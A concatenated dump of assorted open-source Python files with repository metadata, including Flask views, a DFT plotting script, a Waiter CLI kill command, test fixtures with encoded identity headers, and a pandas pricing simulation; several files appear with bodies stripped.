method = st.selectbox("Select the correlation method",
['mutual_info-regression', 'pearson'])
try:
viz = FeatureCorrelation(method=method,
feature_names=feature_cols,
sort=True)
viz.fit(df[feature_cols], df[target_string])
fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation")
st.plotly_chart(fig)
except :
st.warning("Verify the type of problem that you select")
def class_balance(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a class balance graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
classes = st.selectbox("Select Class Column", df.columns, index = len(df.columns) - 1)
visualizer = ClassBalance(labels = df[classes].unique())
visualizer.fit(df[classes])
st_yellowbrick(visualizer)
| 30.511765 | 389 | 0.614035 |
4c33dde47e4450a45e6aa5280d3a4d98189d8d33
| 14,566 |
py
|
Python
|
info/modules/admin/views.py
|
moonbria/test1
|
05893bd91d416ca4093e4619ede427434fa665cc
|
[
"MIT"
] | null | null | null |
info/modules/admin/views.py
|
moonbria/test1
|
05893bd91d416ca4093e4619ede427434fa665cc
|
[
"MIT"
] | null | null | null |
info/modules/admin/views.py
|
moonbria/test1
|
05893bd91d416ca4093e4619ede427434fa665cc
|
[
"MIT"
] | null | null | null |
from flask import request
import random
import re
from flask import current_app, jsonify
from flask import g
from flask import make_response
from flask import redirect
from flask import render_template
from flask import request
from flask import session
from flask import url_for
import time
from info import constants, db
from info import redis_store
from info.lib.yuntongxun.sms import CCP
from info.utils.captcha.captcha import captcha
from info.utils.image_storage import storage
from info.utils.response_code import RET
from info.modules.passport import passport_blu
from info.models import User, Category, News
from info.modules.profile import profile_blu
from info.utils.common import user_login_data
from datetime import datetime, timedelta
from . import admin_blu
| 28.729783 | 87 | 0.604696 |
4c3438c0b1046ec22f1ab42437a0d08677dfe6f2
| 2,839 |
py
|
Python
|
src/predict_model.py
|
Swati17293/outlet-prediction
|
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
|
[
"MIT"
] | 1 |
2020-10-28T00:05:31.000Z
|
2020-10-28T00:05:31.000Z
|
src/predict_model.py
|
Swati17293/outlet-prediction
|
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
|
[
"MIT"
] | null | null | null |
src/predict_model.py
|
Swati17293/outlet-prediction
|
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
|
[
"MIT"
] | 1 |
2021-12-09T14:36:54.000Z
|
2021-12-09T14:36:54.000Z
|
#Answer Generation
import csv
import os
import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text
train_ans, anslist = [], []
if __name__ == "__main__":
main()
| 27.038095 | 89 | 0.534343 |
4c353955c991e91d2a8ac820fc6be7fa23bb7348
| 716 |
py
|
Python
|
tools/client.py
|
Alisa1114/yolov4-pytorch-1
|
5dd8768f2eef868c9ee4588818350d4e1b50b98f
|
[
"MIT"
] | null | null | null |
tools/client.py
|
Alisa1114/yolov4-pytorch-1
|
5dd8768f2eef868c9ee4588818350d4e1b50b98f
|
[
"MIT"
] | null | null | null |
tools/client.py
|
Alisa1114/yolov4-pytorch-1
|
5dd8768f2eef868c9ee4588818350d4e1b50b98f
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
from socket import *
if __name__=='__main__':
client()
# buffer='POST /post HTTP/1.1\r\n'
# buffer+='Content-Type:application/json\r\n'
# buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
# buffer+='Address : ' + address + '\r\n'
# buffer+='\r\n'
# print(buffer)
# message = ":)"
| 25.571429 | 64 | 0.624302 |
4c35e02888592e1186585689132cd3d10b0f4a6d
| 13,039 |
py
|
Python
|
dapy/models/kuramoto_sivashinsky.py
|
hassaniqbal209/data-assimilation
|
ec52d655395dbed547edf4b4f3df29f017633f1b
|
[
"MIT"
] | 11 |
2020-07-29T07:46:39.000Z
|
2022-03-17T01:28:07.000Z
|
dapy/models/kuramoto_sivashinsky.py
|
hassaniqbal209/data-assimilation
|
ec52d655395dbed547edf4b4f3df29f017633f1b
|
[
"MIT"
] | 1 |
2020-07-14T11:49:17.000Z
|
2020-07-29T07:43:22.000Z
|
dapy/models/kuramoto_sivashinsky.py
|
hassaniqbal209/data-assimilation
|
ec52d655395dbed547edf4b4f3df29f017633f1b
|
[
"MIT"
] | 10 |
2020-07-14T11:34:24.000Z
|
2022-03-07T09:08:12.000Z
|
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations.
Acta Astronomica, 4 (1977) pp. 11771206.
"""
from typing import Union, Optional, Sequence, Callable
import numpy as np
from dapy.models.base import AbstractDiagonalGaussianModel
from dapy.models.spatial import SpatiallyExtendedModelMixIn
from dapy.integrators.etdrk4 import FourierETDRK4Integrator
from dapy.models.transforms import (
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
fft,
real_array_to_rfft_coeff,
rfft_coeff_to_real_array,
)
| 47.072202 | 88 | 0.666692 |
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c
| 553 |
py
|
Python
|
setup.py
|
Lif3line/myo-helper
|
7c71a3ee693661ddba0171545bf5798f46231b3c
|
[
"MIT"
] | null | null | null |
setup.py
|
Lif3line/myo-helper
|
7c71a3ee693661ddba0171545bf5798f46231b3c
|
[
"MIT"
] | null | null | null |
setup.py
|
Lif3line/myo-helper
|
7c71a3ee693661ddba0171545bf5798f46231b3c
|
[
"MIT"
] | null | null | null |
"""Utiltiy functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
description='Utiltiy functions for working with Myo Armband data',
author='Lif3line',
author_email='[email protected]',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| 27.65 | 85 | 0.631103 |
4c3bcf54b28a72322eb20b3cefe8c6d28943d5e4
| 1,030 |
py
|
Python
|
demos/restful-users/index.py
|
karldoenitz/karlooper
|
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
|
[
"MIT"
] | 161 |
2016-05-17T12:44:07.000Z
|
2020-07-30T02:18:34.000Z
|
demos/restful-users/index.py
|
karldoenitz/karlooper
|
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
|
[
"MIT"
] | 6 |
2016-08-29T01:40:26.000Z
|
2017-12-29T09:20:41.000Z
|
demos/restful-users/index.py
|
karldoenitz/karlooper
|
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
|
[
"MIT"
] | 16 |
2016-06-27T02:56:54.000Z
|
2019-08-08T08:18:48.000Z
|
# -*-encoding:utf-8-*-
import os
from karlooper.web.application import Application
from karlooper.web.request import Request
url_mapping = {
"/users": UsersHandler,
"/user-info": UserInfoHandler
}
settings = {
"template": os.getcwd() + "/templates",
"static": os.getcwd() + "/templates",
"log_enable": False,
"debug": True
}
if __name__ == '__main__':
application = Application(url_mapping, settings=settings)
application.listen(port=8080)
application.run()
| 23.409091 | 99 | 0.61165 |
4c3c325909dda45d25ada2b46ed9a46e19b99dfc
| 4,154 |
py
|
Python
|
temporal_transforms.py
|
LijiangLong/3D-ResNets-PyTorch
|
89d2cba0b52d55aaa834635a81c172bc38771cd3
|
[
"MIT"
] | null | null | null |
temporal_transforms.py
|
LijiangLong/3D-ResNets-PyTorch
|
89d2cba0b52d55aaa834635a81c172bc38771cd3
|
[
"MIT"
] | null | null | null |
temporal_transforms.py
|
LijiangLong/3D-ResNets-PyTorch
|
89d2cba0b52d55aaa834635a81c172bc38771cd3
|
[
"MIT"
] | null | null | null |
import random
import math
| 26.974026 | 115 | 0.590515 |
4c3c84ef8550fb8c1fe9332f31bf0fbd72087616
| 1,206 |
py
|
Python
|
cli/waiter/subcommands/kill.py
|
geofft/waiter
|
0e10cd497c2c679ea43231866d9f803c3fed5d77
|
[
"Apache-2.0"
] | null | null | null |
cli/waiter/subcommands/kill.py
|
geofft/waiter
|
0e10cd497c2c679ea43231866d9f803c3fed5d77
|
[
"Apache-2.0"
] | null | null | null |
cli/waiter/subcommands/kill.py
|
geofft/waiter
|
0e10cd497c2c679ea43231866d9f803c3fed5d77
|
[
"Apache-2.0"
] | null | null | null |
from waiter.action import process_kill_request
from waiter.util import guard_no_cluster, check_positive
def kill(clusters, args, _, __):
"""Kills the service(s) using the given token name."""
guard_no_cluster(clusters)
token_name_or_service_id = args.get('token-or-service-id')
is_service_id = args.get('is-service-id', False)
force_flag = args.get('force', False)
timeout_secs = args['timeout']
success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs)
return 0 if success else 1
def register(add_parser):
"""Adds this sub-command's parser and returns the action function"""
parser = add_parser('kill', help='kill services')
parser.add_argument('token-or-service-id')
parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true')
parser.add_argument('--service-id', '-s', help='kill by service id instead of token',
dest='is-service-id', action='store_true')
parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete',
type=check_positive, default=30)
return kill
| 46.384615 | 115 | 0.694859 |
4c3ccdaafeb79fdce0197fde1a5c4f83054573ab
| 3,338 |
py
|
Python
|
a2t/src/a2t.py
|
syeda-khurrath/fabric8-analytics-common
|
421f7e27869c5695ed73b51e6422e097aba00108
|
[
"Apache-2.0"
] | null | null | null |
a2t/src/a2t.py
|
syeda-khurrath/fabric8-analytics-common
|
421f7e27869c5695ed73b51e6422e097aba00108
|
[
"Apache-2.0"
] | 4 |
2019-05-20T08:27:47.000Z
|
2019-05-20T08:29:57.000Z
|
a2t/src/a2t.py
|
codeready-analytics/fabric8-analytics-common
|
a763c5534d601f2f40a0f02c02914c49ea23669d
|
[
"Apache-2.0"
] | 1 |
2020-10-05T21:12:44.000Z
|
2020-10-05T21:12:44.000Z
|
"""The main module of the Analytics API Load Tests tool.
Copyright (c) 2019 Red Hat Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
from time import time
from fastlog import log
from csv_reader import read_csv_as_dicts
from setup import setup
from cliargs import cli_parser
from component_analysis import ComponentAnalysis
from stack_analysis import StackAnalysis
from test_runner import start_tests
# current version of this tool
VERSION_MAJOR = 1
VERSION_MINOR = 0
def check_api_endpoint(api):
"""Check that some API endpoint is callable."""
log.info("Checking: core API endpoint")
with log.indent():
if not api.is_api_running():
log.error("Fatal: tested system is not available")
sys.exit(1)
else:
log.success("ok")
def check_auth_token(api):
"""Check the authorization token for the core API."""
log.info("Checking: authorization token for the core API")
with log.indent():
if api.check_auth_token_validity():
log.success("ok")
else:
log.error("Fatal: wrong token(?)")
sys.exit(1)
def check_system(api):
"""Check if all system endpoints are available and that tokens are valid."""
# try to access system endpoints
log.info("System check")
with log.indent():
check_api_endpoint(api)
check_auth_token(api)
def show_version():
"""Show A2T version."""
print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR))
def main():
"""Entry point to the Analytics API Load Tests."""
log.setLevel(log.INFO)
cli_arguments = cli_parser.parse_args()
if cli_arguments.version:
show_version()
sys.exit(0)
else:
cfg = setup(cli_arguments)
coreapi_url = os.environ.get('F8A_SERVER_API_URL', None)
component_analysis = ComponentAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
stack_analysis = StackAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
check_system(component_analysis)
try:
tests = read_csv_as_dicts(cfg["input_file"])
except Exception as e:
log.error("Test description can not be read")
log.error(e)
sys.exit(0)
t1 = time()
tags = cfg["tags"]
start_tests(cfg, tests, tags, component_analysis, stack_analysis)
t2 = time()
log.info("Start time: {}".format(t1))
log.info("End time: {}".format(t2))
log.info("Duration: {}".format(t2 - t1))
if __name__ == "__main__":
# execute only if run as a script
main()
| 30.345455 | 90 | 0.65698 |
4c3d2c0aac2c057e54b3e25d8827904204518172
| 3,568 |
py
|
Python
|
riscv_ctg/ctg.py
|
Giri2801/riscv-ctg
|
a90e03f0856bbdd106c3f6d51815af94707e711e
|
[
"BSD-3-Clause"
] | null | null | null |
riscv_ctg/ctg.py
|
Giri2801/riscv-ctg
|
a90e03f0856bbdd106c3f6d51815af94707e711e
|
[
"BSD-3-Clause"
] | null | null | null |
riscv_ctg/ctg.py
|
Giri2801/riscv-ctg
|
a90e03f0856bbdd106c3f6d51815af94707e711e
|
[
"BSD-3-Clause"
] | null | null | null |
# See LICENSE.incore file for details
import os,re
import multiprocessing as mp
import time
import shutil
from riscv_ctg.log import logger
import riscv_ctg.utils as utils
import riscv_ctg.constants as const
from riscv_isac.cgf_normalize import expand_cgf
from riscv_ctg.generator import Generator
from math import *
from riscv_ctg.__init__ import __version__
| 37.166667 | 114 | 0.626962 |
4c3e29e2ae1ab7be40f9cfea714aae230e6e4e54
| 2,146 |
py
|
Python
|
Back-End/Python/timers/clock_named_tuple.py
|
ASHISHKUMAR2411/Programming-CookBook
|
9c60655d64d21985ccb4196360858d98344701f9
|
[
"MIT"
] | 25 |
2021-04-28T02:51:26.000Z
|
2022-03-24T13:58:04.000Z
|
Back-End/Python/timers/clock_named_tuple.py
|
ASHISHKUMAR2411/Programming-CookBook
|
9c60655d64d21985ccb4196360858d98344701f9
|
[
"MIT"
] | 1 |
2022-03-03T23:33:41.000Z
|
2022-03-03T23:35:41.000Z
|
Back-End/Python/timers/clock_named_tuple.py
|
ASHISHKUMAR2411/Programming-CookBook
|
9c60655d64d21985ccb4196360858d98344701f9
|
[
"MIT"
] | 15 |
2021-05-30T01:35:20.000Z
|
2022-03-25T12:38:25.000Z
|
from collections import namedtuple
MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days')
print('---'*30)
x = add_time('10:00 AM', '54:00', 'Monday')
print(x)
print('---'*30)
| 32.029851 | 102 | 0.592265 |
4c405ed31ecc4361eadac459e688c3b9b4ba7bba
| 225 |
py
|
Python
|
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
mlsurvey/visualize/__init__.py
|
jlaumonier/mlsurvey
|
373598d067c7f0930ba13fe8da9756ce26eecbaf
|
[
"MIT"
] | null | null | null |
from .analyze_logs import AnalyzeLogs
from .search_interface import SearchInterface
from .detail_interface import DetailInterface
from .user_interface import UserInterface
from .visualize_log_detail import VisualizeLogDetail
| 37.5 | 52 | 0.888889 |
4c4211ba5dbc8c290d97362485169fd20badaf8a
| 816 |
py
|
Python
|
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
|
phunc20/dsp
|
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
|
[
"MIT"
] | 1 |
2021-03-12T18:32:06.000Z
|
2021-03-12T18:32:06.000Z
|
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
|
phunc20/dsp
|
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
|
[
"MIT"
] | null | null | null |
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
|
phunc20/dsp
|
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
| 23.314286 | 56 | 0.654412 |
4c43be0918680e081f3bcc9acc58506e39754d60
| 1,421 |
py
|
Python
|
setup.py
|
jerzydziewierz/typobs
|
15fa697386f5fb3a1df53b865557c338be235d91
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
jerzydziewierz/typobs
|
15fa697386f5fb3a1df53b865557c338be235d91
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
jerzydziewierz/typobs
|
15fa697386f5fb3a1df53b865557c338be235d91
|
[
"Apache-2.0"
] | null | null | null |
# setup.py as described in:
# https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable
# to install on your system, run:
# > pip install -e .
from setuptools import setup, find_packages
setup(
name='typobs',
version='0.0.3',
entry_points={
'console_scripts': [
'to_obsidian=to_obsidian:run',
'to_typora=to_typora:run',
]
},
packages=find_packages(),
# metadata to display on PyPI
author="Jerzy Dziewierz",
author_email="[email protected]",
description="Convert between Typora and Obsidian link styles",
keywords="Typora Obsidian Markdown link converter",
url="https://github.com/jerzydziewierz/typobs", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/jerzydziewierz/typobs",
"Documentation": "https://github.com/jerzydziewierz/typobs",
"Source Code": "https://github.com/jerzydziewierz/typobs",
},
classifiers=[
"Programming Language :: Python",
"Topic :: Documentation",
"Topic :: Software Development :: Documentation",
"Topic :: Office/Business",
"Topic :: Text Processing :: Filters",
"Topic :: Text Processing :: Markup",
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"License :: OSI Approved :: Apache Software License",
]
)
| 36.435897 | 87 | 0.640394 |
4c43f28c0f9c6fae0da417c39d88b7b2698c63a6
| 5,775 |
py
|
Python
|
tests/fixtures.py
|
ehelms/system-baseline-backend
|
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
|
[
"Apache-2.0"
] | null | null | null |
tests/fixtures.py
|
ehelms/system-baseline-backend
|
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
|
[
"Apache-2.0"
] | null | null | null |
tests/fixtures.py
|
ehelms/system-baseline-backend
|
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
|
[
"Apache-2.0"
] | null | null | null |
"""
decoded AUTH_HEADER (newlines added for readability):
{
"identity": {
"account_number": "1234",
"internal": {
"org_id": "5678"
},
"type": "User",
"user": {
"email": "[email protected]",
"first_name": "Firstname",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Lastname",
"locale": "en_US",
"username": "test_username"
}
}
"entitlements": {
"smart_management": {
"is_entitled": true
}
}
}
"""
AUTH_HEADER = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6"
"IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiI1"
"Njc4In0sInR5cGUiOiJVc2VyIiwidXNlciI6eyJl"
"bWFpbCI6InRlc3RAZXhhbXBsZS5jb20iLCJmaXJz"
"dF9uYW1lIjoiRmlyc3RuYW1lIiwiaXNfYWN0aXZl"
"Ijp0cnVlLCJpc19pbnRlcm5hbCI6dHJ1ZSwiaXNf"
"b3JnX2FkbWluIjpmYWxzZSwibGFzdF9uYW1lIjoi"
"TGFzdG5hbWUiLCJsb2NhbGUiOiJlbl9VUyIsInVz"
"ZXJuYW1lIjoidGVzdF91c2VybmFtZSJ9fSwiZW50"
"aXRsZW1lbnRzIjogeyJzbWFydF9tYW5hZ2VtZW50"
"IjogeyJpc19lbnRpdGxlZCI6IHRydWUgfX19Cg=="
}
AUTH_HEADER_NO_ENTITLEMENTS = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6Ij"
"EyMzQiLCJ0eXBlIjoiVXNlciIsInVzZXIiOnsidXNl"
"cm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIiwiZW1haWwiOi"
"J0ZXN0QGV4YW1wbGUuY29tIiwiZmlyc3RfbmFtZSI6"
"IkZpcnN0bmFtZSIsImxhc3RfbmFtZSI6Ikxhc3RuYW"
"1lIiwiaXNfYWN0aXZlIjp0cnVlLCJpc19vcmdfYWRt"
"aW4iOmZhbHNlLCJpc19pbnRlcm5hbCI6dHJ1ZSwibG"
"9jYWxlIjoiZW5fVVMifSwiaW50ZXJuYWwiOnsib3Jn"
"X2lkIjoiNTY3OCJ9fX0KCg=="
}
AUTH_HEADER_SMART_MGMT_FALSE = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6"
"IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiAi"
"NTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1c2VyIjp7"
"ImVtYWlsIjoidGVzdEBleGFtcGxlLmNvbSIsImZp"
"cnN0X25hbWUiOiJGaXJzdG5hbWUiLCJpc19hY3Rp"
"dmUiOnRydWUsImlzX2ludGVybmFsIjp0cnVlLCJp"
"c19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0X25hbWUi"
"OiJMYXN0bmFtZSIsImxvY2FsZSI6ImVuX1VTIiwi"
"dXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIn19LCJl"
"bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu"
"dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg=="
}
# this can't happen in real life, adding test anyway
AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJpbnRlcm5hbCI6eyJvcmdf"
"aWQiOiAiNTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1"
"c2VyIjp7ImVtYWlsIjoidGVzdEBleGFtcGxlLmNv"
"bSIsImZpcnN0X25hbWUiOiJGaXJzdG5hbWUiLCJp"
"c19hY3RpdmUiOnRydWUsImlzX2ludGVybmFsIjp0"
"cnVlLCJpc19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0"
"X25hbWUiOiJMYXN0bmFtZSIsImxvY2FsZSI6ImVu"
"X1VTIiwidXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1l"
"In19LCJlbnRpdGxlbWVudHMiOnsic21hcnRfbWFu"
"YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9"
"fX0K"
}
"""
decoded AUTH_HEADER_NO_ACCT (newlines added for readablity):
{
"identity": {
"internal": {
"org_id": "9999"
},
"type": "User",
"user": {
"email": "[email protected]",
"first_name": "No",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Number",
"locale": "en_US",
"username": "nonumber"
}
}
}
"""
AUTH_HEADER_NO_ACCT = {
"X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJ0eXBlIjoiVXNlciIsInVzZXIiO"
"nsidXNlcm5hbWUiOiJub251bWJlciIsImVtYWlsIjoibm"
"9udW1iZXJAZXhhbXBsZS5jb20iLCJmaXJzdF9uYW1lIjo"
"iTm8iLCJsYXN0X25hbWUiOiJOdW1iZXIiLCJpc19hY3Rp"
"dmUiOnRydWUsImlzX29yZ19hZG1pbiI6ZmFsc2UsImlzX"
"2ludGVybmFsIjp0cnVlLCJsb2NhbGUiOiJlbl9VUyJ9LC"
"JpbnRlcm5hbCI6eyJvcmdfaWQiOiI5OTk5In19fQo="
}
BASELINE_ONE_LOAD = {
"baseline_facts": [
{"name": "arch", "value": "x86_64"},
{"name": "phony.arch.fact", "value": "some value"},
],
"display_name": "arch baseline",
}
BASELINE_TWO_LOAD = {
"baseline_facts": [
{"name": "memory", "value": "64GB"},
{"name": "cpu_sockets", "value": "16"},
],
"display_name": "cpu + mem baseline",
}
BASELINE_THREE_LOAD = {
"baseline_facts": [
{"name": "nested", "values": [{"name": "cpu_sockets", "value": "16"}]}
],
"display_name": "cpu + mem baseline",
}
BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]}
BASELINE_PARTIAL_TWO = {
"display_name": "ABCDE",
"baseline_facts": [
{
"name": "hello",
"values": [
{"name": "nested_one", "value": "one"},
{"name": "nested_two", "value": "two"},
],
}
],
}
BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"}
CREATE_FROM_INVENTORY = {
"display_name": "created_from_inventory",
"inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa",
}
SYSTEM_WITH_PROFILE = {
"account": "9876543",
"bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb",
"created": "2018-01-31T13:00:00.100010Z",
"display_name": None,
"fqdn": None,
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
"insights_id": "00000000-28af-11e9-9ab0-c85b761454fa",
"ip_addresses": ["10.0.0.3", "2620:52:0:2598:5054:ff:fecd:ae15"],
"mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"],
"rhel_machine_id": None,
"satellite_id": None,
"subscription_manager_id": "RHN Classic and Red Hat Subscription Management",
"system_profile": {
"salutation": "hi",
"system_profile_exists": False,
"installed_packages": [
"openssl-1.1.1c-2.fc30.x86_64",
"python2-libs-2.7.16-2.fc30.x86_64",
],
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
},
"tags": [],
"updated": "2018-01-31T14:00:00.500000Z",
}
| 31.557377 | 81 | 0.66303 |
4c449a22ce009dfff20f9f81e80e2e5aae88a200
| 3,200 |
py
|
Python
|
2021-02-03/2.py
|
Elfenreigen/MCM-2021-C-SJTU-Test
|
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
|
[
"MIT"
] | 1 |
2022-01-24T11:59:40.000Z
|
2022-01-24T11:59:40.000Z
|
2021-02-03/2.py
|
Elfenreigen/MCM-2021-C-SJTU-Test
|
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
|
[
"MIT"
] | null | null | null |
2021-02-03/2.py
|
Elfenreigen/MCM-2021-C-SJTU-Test
|
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
|
[
"MIT"
] | null | null | null |
#####Time Flow Simulation######
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import timedelta
import datetime
import csv
data=pd.read_excel('CF66-all.xlsx')
data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True)
or_data=pd.read_excel('CF66-ordinary.xlsx')
rule=pd.read_excel('6. Existing pricing strategy.xlsx')
or_name=or_data['WBL_NUM'].unique()
data['ordinary']=0
for i in range(len(data)):
if data.iloc[i,2] in or_name:
data.iloc[i,9]=1
data['volume']=data['CNTR_TYPE']
for i in range(len(data)):
data.iloc[i,10]=int(data.iloc[i,10][0:2])
raw_data=data.groupby('SVVD')
data_to_list=list(raw_data)
raw_list=[]
for i in data_to_list:
raw_list.append(i[1])
total_volume=raw_data['volume'].sum()*1.2
thisrule=rule.groupby(['','']).get_group(('',''))
group_rule=thisrule.groupby(['',''])
rule_to_list=list(group_rule)
day_list=[]
rule_list=[]
for i in rule_to_list:
day_list.append(i[0])
rule_list.append(i[1])
m=datetime.timedelta(days=14)
newlist=[]
for i in raw_list:
i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT'])
m=datetime.timedelta(days=14)
j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m]
newlist.append(j)
del(raw_list)
for i in newlist:
i['acc_volume']=i['volume'].cumsum()
i['total_volume']=i['volume'].sum()*1.2
m=datetime.timedelta(days=14)
i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days
i['acc_rate']=i['acc_volume']/i['total_volume']*100
i['new_AMT']=i['AMT']
for k in range(len(newlist)):
acc_20gp=0
acc_40gp=0
acc_40hq=0
print('k='+str(k))
for i in range(len(day_list)):
print('i='+str(i))
first_day=day_list[i][0]
last_day=day_list[i][1]
flag=[0]*len(rule_list[i])
for j in range(len(newlist[k])):
if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1:
for z in range(len(rule_list[i])):
print('z='+str(z))
if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['']and rule_list[i].iloc[z]['/']=='':
if flag[z]==0:
flag[z]=1
acc_20gp+=rule_list[i].iloc[z]['20GP']
acc_40gp+=rule_list[i].iloc[z]['40GP']
acc_40hq+=rule_list[i].iloc[z]['40HQ']
if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['']and rule_list[i].iloc[z]['/']=='':
if flag[z]==0:
flag[z]=1
acc_20gp-=rule_list[i].iloc[z]['20GP']
acc_40gp-=rule_list[i].iloc[z]['40GP']
acc_40hq-=rule_list[i].iloc[z]['40HQ']
print(flag)
print(acc_20gp)
print(acc_40gp)
print(acc_40hq)
if newlist[k].iloc[j]['CNTR_TYPE']=='20GP':
newlist[k].iloc[j,15]+=acc_20gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40GP':
newlist[k].iloc[j,15]+=acc_40gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ':
newlist[k].iloc[j,15]+=acc_40hq
